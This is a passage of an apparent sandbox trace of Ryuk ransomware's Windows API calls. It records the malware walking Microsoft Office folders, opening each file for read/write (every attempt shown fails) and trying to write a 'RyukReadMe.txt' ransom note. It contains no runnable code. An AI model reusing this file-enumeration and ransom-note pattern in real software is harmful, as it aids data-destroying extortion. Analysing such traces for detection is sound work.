0x350000 [0137.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BOMB.WAV", dwFileAttributes=0x80) returned 0 [0137.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BOMB.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\bomb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.419] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.419] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.419] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.419] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BREEZE.WAV", dwFileAttributes=0x80) returned 0 [0137.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\BREEZE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\breeze.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.419] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.420] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.420] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.420] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CAMERA.WAV", dwFileAttributes=0x80) returned 0 [0137.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CAMERA.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\camera.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.420] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.420] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.420] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.420] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CASHREG.WAV", dwFileAttributes=0x80) returned 0 [0137.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CASHREG.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\cashreg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.421] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.421] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.421] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.421] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CHIMES.WAV", dwFileAttributes=0x80) returned 0 [0137.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CHIMES.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\chimes.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.421] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.421] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.421] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.421] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CLICK.WAV", dwFileAttributes=0x80) returned 0 [0137.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\CLICK.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\click.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.422] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.422] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.422] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.422] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\COIN.WAV", dwFileAttributes=0x80) returned 0 [0137.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\COIN.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\coin.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.422] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.422] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.422] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.422] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\DRUMROLL.WAV", dwFileAttributes=0x80) returned 0 [0137.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\DRUMROLL.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\drumroll.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.423] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.423] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.424] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.424] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\EXPLODE.WAV", dwFileAttributes=0x80) returned 0 [0137.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\EXPLODE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\explode.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.424] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.424] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.424] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.424] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\HAMMER.WAV", dwFileAttributes=0x80) returned 0 [0137.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\HAMMER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\hammer.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.425] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.425] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.425] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.425] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\LASER.WAV", dwFileAttributes=0x80) returned 0 [0137.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\LASER.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\laser.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.425] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.425] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.425] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.425] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\PUSH.WAV", dwFileAttributes=0x80) returned 0 [0137.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\PUSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\push.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.426] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.426] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.426] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.426] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\SUCTION.WAV", dwFileAttributes=0x80) returned 0 [0137.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\SUCTION.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\suction.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.427] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.427] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.427] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.427] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\TYPE.WAV", dwFileAttributes=0x80) returned 0 [0137.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\TYPE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\type.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.428] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.428] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.428] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.428] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\VOLTAGE.WAV", dwFileAttributes=0x80) returned 0 [0137.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\VOLTAGE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\voltage.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.428] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.428] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.428] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.429] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WHOOSH.WAV", dwFileAttributes=0x80) returned 0 [0137.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\whoosh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.429] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.429] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.429] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.429] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WIND.WAV", dwFileAttributes=0x80) returned 0 [0137.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\WIND.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\media\\wind.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.429] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.429] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.430] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.430] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.430] SetLastError (dwErrCode=0x0) [0137.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\media\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.433] GetLastError () returned 0x5 [0137.433] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.433] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.433] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.433] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.433] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml", dwFileAttributes=0x80) returned 0 [0137.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.433] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.433] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.433] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.434] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.434] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml", dwFileAttributes=0x80) returned 0 [0137.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.Runtime.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.434] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.434] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.434] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.434] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.434] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml", dwFileAttributes=0x80) returned 0 [0137.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessApplications.RuntimeUi.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessapplications.runtimeui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.435] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.435] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.435] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.435] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.435] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml", dwFileAttributes=0x80) returned 0 [0137.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.businessdata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.436] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.436] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.436] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.436] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.436] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.436] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.436] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.436] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml", dwFileAttributes=0x80) returned 0 [0137.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.SemiTrust.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.semitrust.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.436] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.436] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.436] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.436] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.436] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml", dwFileAttributes=0x80) returned 0 [0137.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.Office.Interop.InfoPath.Xml.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.office.interop.infopath.xml.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.437] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.437] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.437] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.438] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MLCFG32.CPL", dwFileAttributes=0x80) returned 0 [0137.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MLCFG32.CPL" (normalized: "c:\\program files\\microsoft office\\office14\\mlcfg32.cpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.439] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.439] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.439] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.439] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.439] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MML2OMML.XSL", dwFileAttributes=0x80) returned 0 [0137.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MML2OMML.XSL" (normalized: "c:\\program files\\microsoft office\\office14\\mml2omml.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.442] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.442] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.442] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.442] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.442] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.442] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.442] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSACC.OLB", dwFileAttributes=0x80) returned 0 [0137.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSACC.OLB" (normalized: "c:\\program files\\microsoft office\\office14\\msacc.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.442] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.442] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.442] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.442] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.442] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.443] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.443] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSCOL11.INF", dwFileAttributes=0x80) returned 0 [0137.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MSCOL11.INF" (normalized: "c:\\program files\\microsoft office\\office14\\mscol11.inf"), 